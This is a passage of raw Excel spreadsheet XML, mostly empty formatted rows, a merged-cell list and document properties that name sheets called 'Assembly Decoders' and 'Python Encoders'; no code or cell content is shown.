    <row r="815" spans="38:38" ht="50" customHeight="1">
      <c r="AL815" s="78"/>
    </row>
    <row r="816" spans="38:38" ht="50" customHeight="1">
      <c r="AL816" s="78"/>
    </row>
    <row r="817" spans="38:38" ht="50" customHeight="1">
      <c r="AL817" s="78"/>
    </row>
    <row r="818" spans="38:38" ht="50" customHeight="1">
      <c r="AL818" s="78"/>
    </row>
    <row r="819" spans="38:38" ht="50" customHeight="1">
      <c r="AL819" s="78"/>
    </row>
    <row r="820" spans="38:38" ht="50" customHeight="1">
      <c r="AL820" s="78"/>
    </row>
    <row r="821" spans="38:38" ht="50" customHeight="1">
      <c r="AL821" s="78"/>
    </row>
    <row r="822" spans="38:38" ht="50" customHeight="1">
      <c r="AL822" s="78"/>
    </row>
    <row r="823" spans="38:38" ht="50" customHeight="1">
      <c r="AL823" s="78"/>
    </row>
    <row r="824" spans="38:38" ht="50" customHeight="1">
      <c r="AL824" s="78"/>
    </row>
    <row r="825" spans="38:38" ht="50" customHeight="1">
      <c r="AL825" s="78"/>
    </row>
    <row r="826" spans="38:38" ht="50" customHeight="1">
      <c r="AL826" s="78"/>
    </row>
    <row r="827" spans="38:38" ht="50" customHeight="1">
      <c r="AL827" s="78"/>
    </row>
    <row r="828" spans="38:38" ht="50" customHeight="1">
      <c r="AL828" s="78"/>
    </row>
    <row r="829" spans="38:38" ht="50" customHeight="1">
      <c r="AL829" s="78"/>
    </row>
    <row r="830" spans="38:38" ht="50" customHeight="1">
      <c r="AL830" s="78"/>
    </row>
    <row r="831" spans="38:38" ht="50" customHeight="1">
      <c r="AL831" s="78"/>
    </row>
    <row r="832" spans="38:38" ht="50" customHeight="1">
      <c r="AL832" s="78"/>
    </row>
    <row r="833" spans="38:38" ht="50" customHeight="1">
      <c r="AL833" s="78"/>
    </row>
    <row r="834" spans="38:38" ht="50" customHeight="1">
      <c r="AL834" s="78"/>
    </row>
    <row r="835" spans="38:38" ht="50" customHeight="1">
      <c r="AL835" s="78"/>
    </row>
    <row r="836" spans="38:38" ht="50" customHeight="1">
      <c r="AL836" s="78"/>
    </row>
    <row r="837" spans="38:38" ht="50" customHeight="1">
      <c r="AL837" s="78"/>
    </row>
    <row r="838" spans="38:38" ht="50" customHeight="1">
      <c r="AL838" s="78"/>
    </row>
    <row r="839" spans="38:38" ht="50" customHeight="1">
      <c r="AL839" s="78"/>
    </row>
    <row r="840" spans="38:38" ht="50" customHeight="1">
      <c r="AL840" s="78"/>
    </row>
    <row r="841" spans="38:38" ht="50" customHeight="1">
      <c r="AL841" s="78"/>
    </row>
    <row r="842" spans="38:38" ht="50" customHeight="1">
      <c r="AL842" s="78"/>
    </row>
    <row r="843" spans="38:38" ht="50" customHeight="1">
      <c r="AL843" s="78"/>
    </row>
    <row r="844" spans="38:38" ht="50" customHeight="1">
      <c r="AL844" s="78"/>
    </row>
    <row r="845" spans="38:38" ht="50" customHeight="1">
      <c r="AL845" s="78"/>
    </row>
    <row r="846" spans="38:38" ht="50" customHeight="1">
      <c r="AL846" s="78"/>
    </row>
    <row r="847" spans="38:38" ht="50" customHeight="1">
      <c r="AL847" s="78"/>
    </row>
    <row r="848" spans="38:38" ht="50" customHeight="1">
      <c r="AL848" s="78"/>
    </row>
    <row r="849" spans="38:38" ht="50" customHeight="1">
      <c r="AL849" s="78"/>
    </row>
    <row r="850" spans="38:38" ht="50" customHeight="1">
      <c r="AL850" s="78"/>
    </row>
    <row r="851" spans="38:38" ht="50" customHeight="1">
      <c r="AL851" s="78"/>
    </row>
    <row r="852" spans="38:38" ht="50" customHeight="1">
      <c r="AL852" s="78"/>
    </row>
    <row r="853" spans="38:38" ht="50" customHeight="1">
      <c r="AL853" s="78"/>
    </row>
    <row r="854" spans="38:38" ht="50" customHeight="1">
      <c r="AL854" s="78"/>
    </row>
    <row r="855" spans="38:38" ht="50" customHeight="1">
      <c r="AL855" s="78"/>
    </row>
    <row r="856" spans="38:38" ht="50" customHeight="1">
      <c r="AL856" s="78"/>
    </row>
    <row r="857" spans="38:38" ht="50" customHeight="1">
      <c r="AL857" s="78"/>
    </row>
    <row r="858" spans="38:38" ht="50" customHeight="1">
      <c r="AL858" s="78"/>
    </row>
    <row r="859" spans="38:38" ht="50" customHeight="1">
      <c r="AL859" s="78"/>
    </row>
    <row r="860" spans="38:38" ht="50" customHeight="1">
      <c r="AL860" s="78"/>
    </row>
    <row r="861" spans="38:38" ht="50" customHeight="1">
      <c r="AL861" s="78"/>
    </row>
    <row r="862" spans="38:38" ht="50" customHeight="1">
      <c r="AL862" s="78"/>
    </row>
    <row r="863" spans="38:38" ht="50" customHeight="1">
      <c r="AL863" s="78"/>
    </row>
    <row r="864" spans="38:38" ht="50" customHeight="1">
      <c r="AL864" s="78"/>
    </row>
    <row r="865" spans="38:38" ht="50" customHeight="1">
      <c r="AL865" s="78"/>
    </row>
    <row r="866" spans="38:38" ht="50" customHeight="1">
      <c r="AL866" s="78"/>
    </row>
    <row r="867" spans="38:38" ht="50" customHeight="1">
      <c r="AL867" s="78"/>
    </row>
    <row r="868" spans="38:38" ht="50" customHeight="1">
      <c r="AL868" s="78"/>
    </row>
    <row r="869" spans="38:38" ht="50" customHeight="1">
      <c r="AL869" s="78"/>
    </row>
    <row r="870" spans="38:38" ht="50" customHeight="1">
      <c r="AL870" s="78"/>
    </row>
    <row r="871" spans="38:38" ht="50" customHeight="1">
      <c r="AL871" s="78"/>
    </row>
    <row r="872" spans="38:38" ht="50" customHeight="1">
      <c r="AL872" s="78"/>
    </row>
    <row r="873" spans="38:38" ht="50" customHeight="1">
      <c r="AL873" s="78"/>
    </row>
    <row r="874" spans="38:38" ht="50" customHeight="1">
      <c r="AL874" s="78"/>
    </row>
    <row r="875" spans="38:38" ht="50" customHeight="1">
      <c r="AL875" s="78"/>
    </row>
    <row r="876" spans="38:38" ht="50" customHeight="1">
      <c r="AL876" s="78"/>
    </row>
    <row r="877" spans="38:38" ht="50" customHeight="1">
      <c r="AL877" s="78"/>
    </row>
    <row r="878" spans="38:38" ht="50" customHeight="1">
      <c r="AL878" s="78"/>
    </row>
    <row r="879" spans="38:38" ht="50" customHeight="1">
      <c r="AL879" s="78"/>
    </row>
    <row r="880" spans="38:38" ht="50" customHeight="1">
      <c r="AL880" s="78"/>
    </row>
    <row r="881" spans="38:38" ht="50" customHeight="1">
      <c r="AL881" s="78"/>
    </row>
    <row r="882" spans="38:38" ht="50" customHeight="1">
      <c r="AL882" s="78"/>
    </row>
    <row r="883" spans="38:38" ht="50" customHeight="1">
      <c r="AL883" s="78"/>
    </row>
    <row r="884" spans="38:38" ht="50" customHeight="1">
      <c r="AL884" s="78"/>
    </row>
    <row r="885" spans="38:38" ht="50" customHeight="1">
      <c r="AL885" s="78"/>
    </row>
    <row r="886" spans="38:38" ht="50" customHeight="1">
      <c r="AL886" s="78"/>
    </row>
    <row r="887" spans="38:38" ht="50" customHeight="1">
      <c r="AL887" s="78"/>
    </row>
    <row r="888" spans="38:38" ht="50" customHeight="1">
      <c r="AL888" s="78"/>
    </row>
    <row r="889" spans="38:38" ht="50" customHeight="1">
      <c r="AL889" s="78"/>
    </row>
    <row r="890" spans="38:38" ht="50" customHeight="1">
      <c r="AL890" s="78"/>
    </row>
    <row r="891" spans="38:38" ht="50" customHeight="1">
      <c r="AL891" s="78"/>
    </row>
    <row r="892" spans="38:38" ht="50" customHeight="1">
      <c r="AL892" s="78"/>
    </row>
    <row r="893" spans="38:38" ht="50" customHeight="1">
      <c r="AL893" s="78"/>
    </row>
    <row r="894" spans="38:38" ht="50" customHeight="1">
      <c r="AL894" s="78"/>
    </row>
    <row r="895" spans="38:38" ht="50" customHeight="1">
      <c r="AL895" s="78"/>
    </row>
    <row r="896" spans="38:38" ht="50" customHeight="1">
      <c r="AL896" s="78"/>
    </row>
    <row r="897" spans="38:38" ht="50" customHeight="1">
      <c r="AL897" s="78"/>
    </row>
    <row r="898" spans="38:38" ht="50" customHeight="1">
      <c r="AL898" s="78"/>
    </row>
    <row r="899" spans="38:38" ht="50" customHeight="1">
      <c r="AL899" s="78"/>
    </row>
    <row r="900" spans="38:38" ht="50" customHeight="1">
      <c r="AL900" s="78"/>
    </row>
    <row r="901" spans="38:38" ht="50" customHeight="1">
      <c r="AL901" s="78"/>
    </row>
    <row r="902" spans="38:38" ht="50" customHeight="1">
      <c r="AL902" s="78"/>
    </row>
    <row r="903" spans="38:38" ht="50" customHeight="1">
      <c r="AL903" s="78"/>
    </row>
    <row r="904" spans="38:38" ht="50" customHeight="1">
      <c r="AL904" s="78"/>
    </row>
    <row r="905" spans="38:38" ht="50" customHeight="1">
      <c r="AL905" s="78"/>
    </row>
    <row r="906" spans="38:38" ht="50" customHeight="1">
      <c r="AL906" s="78"/>
    </row>
    <row r="907" spans="38:38" ht="50" customHeight="1">
      <c r="AL907" s="78"/>
    </row>
    <row r="908" spans="38:38" ht="50" customHeight="1">
      <c r="AL908" s="78"/>
    </row>
    <row r="909" spans="38:38" ht="50" customHeight="1">
      <c r="AL909" s="78"/>
    </row>
    <row r="910" spans="38:38" ht="50" customHeight="1">
      <c r="AL910" s="78"/>
    </row>
    <row r="911" spans="38:38" ht="50" customHeight="1">
      <c r="AL911" s="78"/>
    </row>
    <row r="912" spans="38:38" ht="50" customHeight="1">
      <c r="AL912" s="78"/>
    </row>
    <row r="913" spans="38:38" ht="50" customHeight="1">
      <c r="AL913" s="78"/>
    </row>
    <row r="914" spans="38:38" ht="50" customHeight="1">
      <c r="AL914" s="78"/>
    </row>
    <row r="915" spans="38:38" ht="50" customHeight="1">
      <c r="AL915" s="78"/>
    </row>
    <row r="916" spans="38:38" ht="50" customHeight="1">
      <c r="AL916" s="78"/>
    </row>
    <row r="917" spans="38:38" ht="50" customHeight="1">
      <c r="AL917" s="78"/>
    </row>
    <row r="918" spans="38:38" ht="50" customHeight="1">
      <c r="AL918" s="78"/>
    </row>
    <row r="919" spans="38:38" ht="50" customHeight="1">
      <c r="AL919" s="78"/>
    </row>
    <row r="920" spans="38:38" ht="50" customHeight="1">
      <c r="AL920" s="78"/>
    </row>
    <row r="921" spans="38:38" ht="50" customHeight="1">
      <c r="AL921" s="78"/>
    </row>
    <row r="922" spans="38:38" ht="50" customHeight="1">
      <c r="AL922" s="78"/>
    </row>
    <row r="923" spans="38:38" ht="50" customHeight="1">
      <c r="AL923" s="78"/>
    </row>
    <row r="924" spans="38:38" ht="50" customHeight="1">
      <c r="AL924" s="78"/>
    </row>
    <row r="925" spans="38:38" ht="50" customHeight="1">
      <c r="AL925" s="78"/>
    </row>
    <row r="926" spans="38:38" ht="50" customHeight="1">
      <c r="AL926" s="78"/>
    </row>
    <row r="927" spans="38:38" ht="50" customHeight="1">
      <c r="AL927" s="78"/>
    </row>
    <row r="928" spans="38:38" ht="50" customHeight="1">
      <c r="AL928" s="78"/>
    </row>
    <row r="929" spans="38:38" ht="50" customHeight="1">
      <c r="AL929" s="78"/>
    </row>
    <row r="930" spans="38:38" ht="50" customHeight="1">
      <c r="AL930" s="78"/>
    </row>
    <row r="931" spans="38:38" ht="50" customHeight="1">
      <c r="AL931" s="78"/>
    </row>
    <row r="932" spans="38:38" ht="50" customHeight="1">
      <c r="AL932" s="78"/>
    </row>
    <row r="933" spans="38:38" ht="50" customHeight="1">
      <c r="AL933" s="78"/>
    </row>
    <row r="934" spans="38:38" ht="50" customHeight="1">
      <c r="AL934" s="78"/>
    </row>
    <row r="935" spans="38:38" ht="50" customHeight="1">
      <c r="AL935" s="78"/>
    </row>
    <row r="936" spans="38:38" ht="50" customHeight="1">
      <c r="AL936" s="78"/>
    </row>
    <row r="937" spans="38:38" ht="50" customHeight="1">
      <c r="AL937" s="78"/>
    </row>
    <row r="938" spans="38:38" ht="50" customHeight="1">
      <c r="AL938" s="78"/>
    </row>
    <row r="939" spans="38:38" ht="50" customHeight="1">
      <c r="AL939" s="78"/>
    </row>
    <row r="940" spans="38:38" ht="50" customHeight="1">
      <c r="AL940" s="78"/>
    </row>
    <row r="941" spans="38:38" ht="50" customHeight="1">
      <c r="AL941" s="78"/>
    </row>
    <row r="942" spans="38:38" ht="50" customHeight="1">
      <c r="AL942" s="78"/>
    </row>
    <row r="943" spans="38:38" ht="50" customHeight="1">
      <c r="AL943" s="78"/>
    </row>
    <row r="944" spans="38:38" ht="50" customHeight="1">
      <c r="AL944" s="78"/>
    </row>
    <row r="945" spans="38:38" ht="50" customHeight="1">
      <c r="AL945" s="78"/>
    </row>
    <row r="946" spans="38:38" ht="50" customHeight="1">
      <c r="AL946" s="78"/>
    </row>
    <row r="947" spans="38:38" ht="50" customHeight="1">
      <c r="AL947" s="78"/>
    </row>
    <row r="948" spans="38:38" ht="50" customHeight="1">
      <c r="AL948" s="78"/>
    </row>
    <row r="949" spans="38:38" ht="50" customHeight="1">
      <c r="AL949" s="78"/>
    </row>
    <row r="950" spans="38:38" ht="50" customHeight="1">
      <c r="AL950" s="78"/>
    </row>
    <row r="951" spans="38:38" ht="50" customHeight="1">
      <c r="AL951" s="78"/>
    </row>
    <row r="952" spans="38:38" ht="50" customHeight="1">
      <c r="AL952" s="78"/>
    </row>
    <row r="953" spans="38:38" ht="50" customHeight="1">
      <c r="AL953" s="78"/>
    </row>
    <row r="954" spans="38:38" ht="50" customHeight="1">
      <c r="AL954" s="78"/>
    </row>
    <row r="955" spans="38:38" ht="50" customHeight="1">
      <c r="AL955" s="78"/>
    </row>
    <row r="956" spans="38:38" ht="50" customHeight="1">
      <c r="AL956" s="78"/>
    </row>
    <row r="957" spans="38:38" ht="50" customHeight="1">
      <c r="AL957" s="78"/>
    </row>
    <row r="958" spans="38:38" ht="50" customHeight="1">
      <c r="AL958" s="78"/>
    </row>
    <row r="959" spans="38:38" ht="50" customHeight="1">
      <c r="AL959" s="78"/>
    </row>
    <row r="960" spans="38:38" ht="50" customHeight="1">
      <c r="AL960" s="78"/>
    </row>
    <row r="961" spans="38:38" ht="50" customHeight="1">
      <c r="AL961" s="78"/>
    </row>
    <row r="962" spans="38:38" ht="50" customHeight="1">
      <c r="AL962" s="78"/>
    </row>
    <row r="963" spans="38:38" ht="50" customHeight="1">
      <c r="AL963" s="78"/>
    </row>
    <row r="964" spans="38:38" ht="50" customHeight="1">
      <c r="AL964" s="78"/>
    </row>
    <row r="965" spans="38:38" ht="50" customHeight="1">
      <c r="AL965" s="78"/>
    </row>
    <row r="966" spans="38:38" ht="50" customHeight="1">
      <c r="AL966" s="78"/>
    </row>
    <row r="967" spans="38:38" ht="50" customHeight="1">
      <c r="AL967" s="78"/>
    </row>
    <row r="968" spans="38:38" ht="50" customHeight="1">
      <c r="AL968" s="78"/>
    </row>
    <row r="969" spans="38:38" ht="50" customHeight="1">
      <c r="AL969" s="78"/>
    </row>
    <row r="970" spans="38:38" ht="50" customHeight="1">
      <c r="AL970" s="78"/>
    </row>
    <row r="971" spans="38:38" ht="50" customHeight="1">
      <c r="AL971" s="78"/>
    </row>
    <row r="972" spans="38:38" ht="50" customHeight="1">
      <c r="AL972" s="78"/>
    </row>
    <row r="973" spans="38:38" ht="50" customHeight="1">
      <c r="AL973" s="78"/>
    </row>
    <row r="974" spans="38:38" ht="50" customHeight="1">
      <c r="AL974" s="78"/>
    </row>
    <row r="975" spans="38:38" ht="50" customHeight="1">
      <c r="AL975" s="78"/>
    </row>
    <row r="976" spans="38:38" ht="50" customHeight="1">
      <c r="AL976" s="78"/>
    </row>
    <row r="977" spans="38:38" ht="50" customHeight="1">
      <c r="AL977" s="78"/>
    </row>
    <row r="978" spans="38:38" ht="50" customHeight="1">
      <c r="AL978" s="78"/>
    </row>
    <row r="979" spans="38:38" ht="50" customHeight="1">
      <c r="AL979" s="78"/>
    </row>
    <row r="980" spans="38:38" ht="50" customHeight="1">
      <c r="AL980" s="78"/>
    </row>
    <row r="981" spans="38:38" ht="50" customHeight="1">
      <c r="AL981" s="78"/>
    </row>
    <row r="982" spans="38:38" ht="50" customHeight="1">
      <c r="AL982" s="78"/>
    </row>
    <row r="983" spans="38:38" ht="50" customHeight="1">
      <c r="AL983" s="78"/>
    </row>
    <row r="984" spans="38:38" ht="50" customHeight="1">
      <c r="AL984" s="78"/>
    </row>
    <row r="985" spans="38:38" ht="50" customHeight="1">
      <c r="AL985" s="78"/>
    </row>
    <row r="986" spans="38:38" ht="50" customHeight="1">
      <c r="AL986" s="78"/>
    </row>
    <row r="987" spans="38:38" ht="50" customHeight="1">
      <c r="AL987" s="78"/>
    </row>
    <row r="988" spans="38:38" ht="50" customHeight="1">
      <c r="AL988" s="78"/>
    </row>
    <row r="989" spans="38:38" ht="50" customHeight="1">
      <c r="AL989" s="78"/>
    </row>
    <row r="990" spans="38:38" ht="50" customHeight="1">
      <c r="AL990" s="78"/>
    </row>
    <row r="991" spans="38:38" ht="50" customHeight="1">
      <c r="AL991" s="78"/>
    </row>
    <row r="992" spans="38:38" ht="50" customHeight="1">
      <c r="AL992" s="78"/>
    </row>
    <row r="993" spans="38:38" ht="50" customHeight="1">
      <c r="AL993" s="78"/>
    </row>
    <row r="994" spans="38:38" ht="50" customHeight="1">
      <c r="AL994" s="78"/>
    </row>
    <row r="995" spans="38:38" ht="50" customHeight="1">
      <c r="AL995" s="78"/>
    </row>
    <row r="996" spans="38:38" ht="50" customHeight="1">
      <c r="AL996" s="78"/>
    </row>
    <row r="997" spans="38:38" ht="50" customHeight="1">
      <c r="AL997" s="78"/>
    </row>
    <row r="998" spans="38:38" ht="50" customHeight="1">
      <c r="AL998" s="78"/>
    </row>
    <row r="999" spans="38:38" ht="50" customHeight="1">
      <c r="AL999" s="78"/>
    </row>
    <row r="1000" spans="38:38" ht="50" customHeight="1">
      <c r="AL1000" s="78"/>
    </row>
    <row r="1001" spans="38:38" ht="50" customHeight="1">
      <c r="AL1001" s="78"/>
    </row>
    <row r="1002" spans="38:38" ht="50" customHeight="1">
      <c r="AL1002" s="78"/>
    </row>
    <row r="1003" spans="38:38" ht="50" customHeight="1">
      <c r="AL1003" s="78"/>
    </row>
  </sheetData>
  <mergeCells count="20">
    <mergeCell ref="AI1:AJ1"/>
    <mergeCell ref="AK1:AL1"/>
    <mergeCell ref="AM1:AN1"/>
    <mergeCell ref="O1:P1"/>
    <mergeCell ref="Q1:R1"/>
    <mergeCell ref="S1:T1"/>
    <mergeCell ref="U1:V1"/>
    <mergeCell ref="W1:X1"/>
    <mergeCell ref="Y1:Z1"/>
    <mergeCell ref="AA1:AB1"/>
    <mergeCell ref="K1:L1"/>
    <mergeCell ref="M1:N1"/>
    <mergeCell ref="AC1:AD1"/>
    <mergeCell ref="AE1:AF1"/>
    <mergeCell ref="AG1:AH1"/>
    <mergeCell ref="A1:B1"/>
    <mergeCell ref="C1:D1"/>
    <mergeCell ref="E1:F1"/>
    <mergeCell ref="G1:H1"/>
    <mergeCell ref="I1:J1"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink ref="AN9" r:id="rId1" xr:uid="{00000000-0004-0000-0400-000000000000}"/>
    <hyperlink ref="AN11" r:id="rId2" xr:uid="{00000000-0004-0000-04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Assembly Decoders</vt:lpstr>
      <vt:lpstr>Python Encoders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2021-08-12T14:13:56Z</dcterms:modified>
</cp:coreProperties>
</file>